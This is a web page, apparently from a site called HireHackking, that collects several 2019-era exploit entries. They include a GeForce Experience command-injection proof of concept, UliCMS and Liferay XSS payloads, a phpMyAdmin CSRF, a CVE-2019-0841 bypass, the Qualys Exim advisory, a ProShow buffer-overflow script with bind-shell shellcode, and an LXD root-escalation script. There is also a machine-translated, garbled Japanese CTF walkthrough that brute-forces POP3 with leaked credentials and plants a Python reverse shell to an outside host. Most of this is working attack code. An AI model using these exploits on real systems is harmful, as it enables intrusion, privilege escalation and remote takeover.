HireHackking

<!-- POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser Author: David Yesland -- Rhino Security Labs --> <html> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> </head> <body> <script> //Send request to local GFE server function submitRequest(port,secret) { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "text\/html"); xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret); var body = "\""+document.getElementById("cmd").value+"\""; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } $(document).on('change', '.file-upload-button', function(event) { var reader = new FileReader(); reader.onload = function(event) { var jsonObj = JSON.parse(event.target.result); submitRequest(jsonObj.port,jsonObj.secret); } reader.readAsText(event.target.files[0]); }); //Copy text from some text field function myFunction() { var copyText = document.getElementById("myInput"); copyText.select(); document.execCommand("copy"); } //trigger the copy and file window on ctrl press $(document).keydown(function(keyPressed) { if (keyPressed.keyCode == 17) { myFunction();document.getElementById('file-input').click(); } }); </script> <h2> Press CTRL+V+Enter </h2> <!--Command to run in a hidden input field--> <input type="hidden" value="calc.exe" id="cmd" size="55"> <!--Hidden text box to copy text from--> <div style="opacity: 0.0;"> <input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json" id="myInput" size="1"> </div> <!--file input--> <input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" /> </body> </html>

# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting # Google Dork: intext:"by UliCMS" # Date: 2019-05-12 # Exploit Author: Unk9vvN # Vendor Homepage: https://en.ulicms.de # Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig # Version: 2019.1 # Tested on: Kali Linux # CVE : CVE-2019-11398 # Description # This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows. # Vuln One # URI: POST /ulicms/admin/index.php?action=languages # Parameter: name="><script>alert('UNK9VVN')</script> # Vuln Two # URI: POST /ulicms/admin/index.php?action=pages_edit&page=23 # Parameter: systemname="><script>alert('UNK9VVN')</script> # # PoC POST (Cross Site Scripting Stored) # POST /ulicms/admin/index.php HTTP/1.1 Host: XXXXXXXX.ngrok.io User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages Content-Type: application/x-www-form-urlencoded Content-Length: 165 Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E # # PoC POST (Cross Site Scripting Stored) # POST /ulicms/admin/index.php HTTP/1.1 Host: XXXXXXXX.ngrok.io User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 904 Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 Connection: close DNT: 1 csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content= # Discovered by: t.me/Unk9vvN

CVE-2019-0841 BYPASS #2 There is a second bypass for CVE-2019-0841. This can be triggered as following: Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (atleast the ones we can delete as user) Try to launch edge. It will crash the first time. When we launch it a second time, it will write the DACL while impersonating "SYSTEM". The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation. You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There is probably other ways too. Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy. To repro: 1. Launch my poc 2. Launch edge several times Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Make sure you have multiple cores in your VM (not multiple processors, multiple cores). It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... which will also cause it to lock up. EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46976.zip

Qualys Security Advisory The Return of the WIZard: RCE in Exim (CVE-2019-10149) ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default configurations - Default configuration Acknowledgments Timeline Boromir: "What is this new devilry?" Gandalf: "A Balrog. A demon of the Ancient World." -- The Lord of the Rings: The Fellowship of the Ring ======================================================================== Summary ======================================================================== During a code review of the latest changes in the Exim mail server (https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means Remote *Command* Execution, not Remote Code Execution: an attacker can execute arbitrary commands with execv(), as root; no memory corruption or ROP (Return-Oriented Programming) is involved. This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations). To remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days (by transmitting one byte every few minutes). However, because of the extreme complexity of Exim's code, we cannot guarantee that this exploitation method is unique; faster methods may exist. Exim is vulnerable by default since version 4.87 (released on April 6, 2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled manually. Surprisingly, this vulnerability was fixed in version 4.92 (released on February 10, 2019): https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8... https://bugs.exim.org/show_bug.cgi?id=2310 but was not identified as a security vulnerability, and most operating systems are therefore affected. For example, we exploit an up-to-date Debian distribution (9.9) in this advisory. ======================================================================== Local exploitation ======================================================================== The vulnerable code is located in deliver_message(): 6122 #ifndef DISABLE_EVENT 6123 if (process_recipients != RECIP_ACCEPT) 6124 { 6125 uschar * save_local = deliver_localpart; 6126 const uschar * save_domain = deliver_domain; 6127 6128 deliver_localpart = expand_string( 6129 string_sprintf("${local_part:%s}", new->address)); 6130 deliver_domain = expand_string( 6131 string_sprintf("${domain:%s}", new->address)); 6132 6133 (void) event_raise(event_action, 6134 US"msg:fail:internal", new->message); 6135 6136 deliver_localpart = save_local; 6137 deliver_domain = save_domain; 6138 } 6139 #endif Because expand_string() recognizes the "${run{<command> <args>}}" expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to "${run{...}}@localhost" (where "localhost" is one of Exim's local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default): [...] ======================================================================== Remote exploitation ======================================================================== Our local-exploitation method does not work remotely, because the "verify = recipient" ACL (Access-Control List) in Exim's default configuration requires the local part of the recipient's address (the part that precedes the @ sign) to be the name of a local user: [...] ------------------------------------------------------------------------ Non-default configurations ------------------------------------------------------------------------ We eventually devised an elaborate method for exploiting Exim remotely in its default configuration, but we first identified various non-default configurations that are easy to exploit remotely: - If the "verify = recipient" ACL was removed manually by an administrator (maybe to prevent username enumeration via RCPT TO), then our local-exploitation method also works remotely. - If Exim was configured to recognize tags in the local part of the recipient's address (via "local_part_suffix = +* : -*" for example), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the name of a local user). - If Exim was configured to relay mail to a remote domain, as a secondary MX (Mail eXchange), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum" (where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the "verify = recipient" ACL can only check the domain part of a remote address (the part that follows the @ sign), not the local part. ------------------------------------------------------------------------ Default configuration ------------------------------------------------------------------------ [...] ======================================================================== Acknowledgments ======================================================================== We thank Exim's developers, Solar Designer, and the members of distros@openwall. "The Return of the WIZard" is a reference to Sendmail's ancient WIZ and DEBUG vulnerabilities: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145 https://seclists.org/bugtraq/1995/Feb/56 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095 http://www.cheswick.com/ches/papers/berferd.pdf ======================================================================== Timeline ======================================================================== 2019-05-27: Advisory sent to security@exim. 2019-05-28: Advisory sent to distros@openwall.

#!/usr/bin/python # _*_ coding:utf-8 _*_ # Exploit Title: ProShow v9.0.3797 Local Exploit # Exploit Author: @Yonatan_Correa # website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html # Vendor Homepage: http://www.photodex.com/ProShow # Software Link: http://files.photodex.com/release/pspro_90_3797.exe # Version: v9.0.3797 # Tested on: Wind 7 from struct import pack informacion = """ ProShow v9.0.3797 http://www.photodex.com/ProShow execute exploit create a file called "load" copy load "C:\Program Files\Photodex\ProShow Producer\" "C:\Program Files\Photodex\ProShow Producer\proshow.exe" And connect nc -nv IP_Host 4444 Testing: Windows 7 @Yonatan_Correa https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html """ # msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c # Payload size: 717 bytes shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" "\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b" "\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59" "\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e" "\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52" "\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e" "\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51" "\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42" "\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b" "\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52" "\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49" "\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53" "\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d" "\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53" "\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78" "\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56" "\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b" "\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64" "\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f" "\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c" "\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38" "\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51" "\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71" "\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46" "\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78" "\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30" "\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55" "\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d" "\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b" "\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a" "\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34" "\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33" "\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38" "\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76" "\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66" "\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76" "\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70" "\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56" "\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59" "\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70" "\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47" "\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54" "\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f" "\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b" "\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f" "\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41") junk = shell + ("\x41" * 9479) # 10204 nseh = "\xEB\x06\x90\x90" seh = pack('<I',0x10045f50) # pop pop ret nop = "\x90" * 86 nop2 = "\x90" * 10 egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") todo = junk + nseh + seh + nop + egg + nop2 arch = open("load", "wb") arch.write(todo) arch.close() print informacion print "\nCreated File size " + str(len(todo))

#!/usr/bin/env bash # ---------------------------------- # Authors: Marcelo Vazquez (S4vitar) # Victor Lasa (vowkin) # ---------------------------------- # Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine] # Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine] # Step 3: Run this script and you will get root [Victim Machine] # Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine function helpPanel(){ echo -e "\nUsage:" echo -e "\t[-f] Filename (.tar.gz alpine file)" echo -e "\t[-h] Show this help panel\n" exit 1 } function createContainer(){ lxc image import $filename --alias alpine && lxd init --auto echo -e "[*] Listing images...\n" && lxc image list lxc init alpine privesc -c security.privileged=true lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true lxc start privesc lxc exec privesc sh cleanup } function cleanup(){ echo -en "\n[*] Removing container..." lxc stop privesc && lxc delete privesc && lxc image delete alpine echo " [√]" } set -o nounset set -o errexit declare -i parameter_enable=0; while getopts ":f:h:" arg; do case $arg in f) filename=$OPTARG && let parameter_enable+=1;; h) helpPanel;; esac done if [ $parameter_enable -ne 1 ]; then helpPanel else createContainer fi

1。情報収集 1.生き残った宿主をスカン ARP-SCAN-L 192.168.1.13がターゲットマシンのIPアドレスであることがわかりました。 2.ポートスキャン 次に、NMAPアーティファクトを使用してターゲットIPアドレスをスキャンします。コマンドは次のとおりです。 root@kali2018:〜＃nmap -a192.168.1.13 2019-02-13 01:18 ESTでNMAP 7.70（https://nmap.org）を開始 192.168.1.13のNMAPスキャンレポート ホストはアップ（0.0014Sレイテンシ）です。 表示されていません: 996閉じたポート ポートステートサービスバージョン 22/tcpopensshopenssh 7.2p2 ubuntu 4ubuntu2.4（ubuntu linux; Protocol 2.0） | ssh-hostkey: |2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA) | 256 53:9D:2:67:34:CF:0A:D5:5A:9A:113:74:BD33333333333333333333:DSE3333333333:DS） |_256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b13:d7:1b:66:83 （ED25519） 80/tcpopenhttpapache httpd 2.4.18（（ubuntu）） | http-robots.txt: 1無効エントリ | _/ | _http-server-header: apache/2.4.18（ubuntu） | _HTTP -TITLE: FOWSNIFF CORP-ソリューションの配信 110/TCP OpenPop3Dovecot POP3D | _pop3-capability: auth-resp-code uidl sasl（plain）パイプラインユーザーCAPAトップリスコード 143/tcp openimapdovecot imapd | _imap-capabilities:はOKを持っています。 MACアドレス: 08:00336027:1E336080:B0（Oracle VirtualBox Virtual Nic） デバイスタイプ:汎用 running: linux 3.x | 4.x OS CPE: CPE:/O:LINUX:LINUX_KERNEL3:3 CPE:/O:LINUX33:LINUX_KERNEL:4 OS詳細: Linux 3.2-4.9 ネットワーク距離: 1ホップ サービス情報: OS: Linux; CPE: CPE:/O:LINUX:LINUX_KERNEL Traceroute ホップrttaddress 11.38 MS 192.168.1.13 OSとサービスの検出が実行されました。誤った結果はhttps://nmap.org/submit/で報告してください。 NMAP DONE: 1 IPアドレス（1ホストアップ）9.44秒でスキャン スキャンの結果は、4つのポートがオープン、22（SSH）、80（HTTP）、110（POP3）、および143（IMAP）が開いていることを示しています。 2。ターゲットマシンの侵入 1。最初に、ポート80が何かを獲得するかどうかを確認します。ブラウザを開いてアクセスしてください。 発表情報を使用して、ページをスクロールする静的HTMLページのように見えます：@fowsniffcorp ページには何も見つかりませんでしたし、DIRBとNiktoでスキャンを続けることに利益はありませんでした root@kali2018:〜＃dirb http://192.168.1.13 root@kali2018:〜＃nikto -h http://192.168.1.13 だから私はページに表示されたfowsniff Corpをグーグルで検索しました 粘着性のツイートでFowsniff Twitter（@fowsniffcorp）を見つけました： リンクアドレスhttps://pastebin.com/nraqveexを開いた後、ウェブサイトのメールボックスから漏れた電子メールユーザーとパスワードがページに表示されます。 パスワードはMD5形式であり、SODM5（https://www.somd5.com/batch.html）またはHashcatを使用してパスワードを復号化できます。 次に、ユーザー名とパスワードの辞書を作成し、Hydraを介してPOP3を爆破します。 まず、すべてのユーザー名をuser.txtファイルに貼り付けて保存し、すべてのパスワードをpass.txtファイルに貼り付けて保存します。 MSFを使用してPOP3ログインを爆破することもできます。コマンドと構成は次のとおりです。 MSFUSEAUXILIARY/SCANNER/POP3/POP3_LOGIN MSF Auxiliary（Scanner/POP3/POP3_LOGIN）SET RHOSTS192.168.1.13 Rhosts=192.168.1.13 MSF Auxiliary（scanner/pop3/pop3_login）set user_file /opt/user.txtを設定します user_file=/opt/user.txt MSF Auxiliary（Scanner/POP3/POP3_LOGIN）SET PASS_FILE /OPT/PASS.TXT pass_file=/opt/pass.txt MSF Auxiliary（Scanner/POP3/POP3_LOGIN）はfalseを設定します verbose=false MSF補助（スキャナー/POP3/POP3_LOGIN）エクスプロイト 実行後、図に示すように、正しい資格情報「Seina:scoobydoo2」が見つかりました。 次のように、メールアドレスはHydraを介して爆破されます。 hydra -l users.txt -p pass.txt -f {ip} pop3 -l〜username wordlist -p〜パスワードワードリスト -f〜有効なユーザーが見つかったときにひび割れを停止します root@kali2018:/opt＃hydra -l user.txt -p pass.txt -f 192.168.1.13pop3 ユーザー名Seinaと対応するパスワードが正常に爆破されていることがわかります。 次に、ターゲットマシンのPOP3サービスに接続し、取得したばかりの資格情報を使用してログインします。ログインした後、情報を確認して、2つのメッセージを見つけました。コマンドは次のとおりです。 root@kali2018:/opt＃nc 192.168.1.13 110 +ok fowsniffコーポレートメールサーバーへようこそ！ ユーザーセイナ +OK Scoobydoo2を渡します +OKログインしました。 リスト +OK 2メッセージ: 1 1622 2 1280 リストコマンドを使用して、電子メール情報があるかどうかを確認します。 2つのメッセージがあることがわかります。その後、RETR [ID]を使用してメッセージを読み取ります。 最初のメッセージの内容を見て、SSHを含む一時的なパスワードは「s1ck3nbluff + secureShell」であることがわかりました。 ret 1 +OK 1622オクテット Return-Path: Stone@Fowsniff X-Original-to: Seina@Fowsniff : Seina@Fowsniffに配信 fowsniffによる3:（postfix、userid1000から） ID 0FA3916A;火曜日、2018年3月13日14:51:07 -0400（EDT） to: baksteen@fowsniff、mauer@fowsniff、mursten@fowsniff、 Mustikka@fowsniff、parede@fowsniff、sciana@fowsniff、seina@fowsniff、 tegel@fowsniff 件名:緊急！セキュリティイベント！ Message-ID: 20180313185107.0FA3916A@FOWSNIFF 日付:火、2018年3月13日14336051:07 -0400（EDT） From: Stone@Fowsniff（Stone） 親愛なるみんな、 数日前、悪意のある俳優がエントリーを得ることができました 私たちの内部電子メールシステム。攻撃者は悪用することができました SQLデータベース内で誤ってフィルタリングされた脱出文字 ログイン資格情報にアクセスします。 SQLと認証の両方 システムは、しばらく更新されていなかったレガシー方法を使用しました。 完全な内部システムを実行するように指示されました オーバーホール。メインシステムは「店内」ですが、 最小限のこの孤立した一時的なサーバーに移動しました 機能。 このサーバーはメールを送信および受信することができますが、 ローカル。つまり、他のユーザーにしかメールで送信できず、 World Wide Webへ。ただし、このシステムにアクセスできます SSHプロトコル。 SSHの一時的なパスワードは「s1ck3nbluff+secureShell」です このパスワードをできるだけ早く変更する必要があります。 ガイダンス。私は攻撃者がオンラインで投稿したリークを見ました、そして私はあなたの パスワードはあまり安全ではありませんでした。 あなたの最も早い都合で私のオフィスで私に会いに来てください、そして私たちはそれをセットアップします。 ありがとう、 A.Jストーン 次に、2番目のメッセージを確認します。メッセージでは、送信者がbaksteen@fowsniffであることがわかります。ユーザー名はBaksteenであると推測できます。 ret 2 +OK 1280オクテット return-path: baksteen@fowsniff X-Original-to: Seina@Fowsniff : Seina@Fowsniffに配信 fowsniffによる3:（postfix、from userid1004） ID 101CA1AC2;火曜日、2018年3月13日14:54:05 -0400（EDT） to: seina@fowsniff subject:あなたは逃しました！ Message-id: 20180313185405.101ca1ac2@fowsniff 日付:火、2018年3月13日14336054:05 -0400（EDT） from: baksteen@fowsniff デヴィン、 あなたは今日、真鍮がAJに横たわるのを見るべきだった！ 私たちはこの1つについて話をします。 地域のマネージャーが海軍にいたことを誰が知っていましたか？彼女は船乗りのように誓っていました！ どんな種類の肺炎やあなたが持ち帰るものがわかりません あなたはあなたのキャンプ旅行からですが、私は自分でそれを持ってくると思います。 あなたはどのくらい去っていましたか - 一週間？ 次回は病気になり、世紀の経営者の吹き出物を逃すつもりです 少なくとも自分自身に保管してください！ 早く家に帰り、チキンスープを食べます。 私もストーンからメールを受け取ったと思いますが、おそらくいくつかです 「経営陣との私の会議のトーンを説明させてください」と顔を節約します。 戻ってきたら読みます。 気分が良くなる、 スカイラー PS:メールパスワードを変更してください。 AJは、キャプテンの冒とくが現れる直前にそれをするように言っていました。 次に、取得したばかりの資格情報、つまりユーザー名：baksteenパスワード：s1ck3nbluff+secureShellを使用してSSHにログインします root@kali2018:/opt＃ssh baksteen@192.168.1.13 3。権限の提供 1。最初のタイプの許可強化 ログインに成功しました。システムの列挙後、ユーザーBaksteenが2つの異なるグループに属していることがわかりました。ユーザーグループに属するファイルを見つけようとし、スクリプト「Cube.sh」を見つけました。検索コマンドは次のとおりです。 baksteen@fowsniff:〜 $ find/group users -Type F 2/dev/null このスクリプトファイルのコンテンツを確認したところ、SSHにログインした後に表示されるインターフェイス情報が含まれていることがわかりました。上記の写真でSSHログインが成功した後、スクリーンショットを比較することでわかります。 baksteen@fowsniff:〜 $ cd /opt /cube baksteen@fowsniff:/opt/cube $ ls baksteen@fowsniff:/opt/cube $ cat cube.sh VIMを使用してファイルを開き、ファイルの最後にPythonリバウンドシェルコマンドの行を追加します。 python-c'importsocket、subprocess、os; s=socket.socket.socket（socket.af_inet、socket.sock_stream）; s.connect（（ '192.168.1.21 '、1234）） 写真に示されているように： 保存後、スクリプトを実行してエラーを報告しようとします。エラーメッセージは「Pythonコマンドが見つかりません」です。そこで、システムでPythonを検索したところ、図に示すように、Python3がインストールされていることがわかりました。 そのため、次のように、コマンドをシェルをPython3にリバウンドするように変更します。 python3-c'importsocket、subprocess、os; s=socket.socket（socket.af_inet、socket.sock_stream）; s.connect（（ '192.168.1.29'、1234））; os.dup2（s.fileno（）、0）; os.dup2（s.fileno（）、1）;

# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS # Date: 04/06/2019 # Exploit Author: Valerio Brussani (@val_brux) # Website: www.valbrux.it # Vendor Homepage: https://www.liferay.com/ # Software Link: https://www.liferay.com/it/downloads-community # Version: < 7.1 CE GA4 # Tested on: Liferay Portal 7.1 CE GA3 # CVE: CVE-2019-6588 # Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3 # Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/ Introduction In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. Poc In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form: &xxxx%22%3e%3cscript%3ealert(1)</script> The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha: <img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />

# Exploit Title: Cross Site Request Forgery (CSRF) # Date: 11 June 2019 # Exploit Author: Riemann # Vendor Homepage: https://www.phpmyadmin.net/ # Software Link: https://www.phpmyadmin.net/downloads/ # Version: 4.8 # Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 # CVE : 2019-12616 # Description # An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim. #VULNERABILITY: The following request which is a form submission is done using the ¨GET¨ request instead of using ¨POST <form method="get" action="index.php" class="disableAjax"> GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; 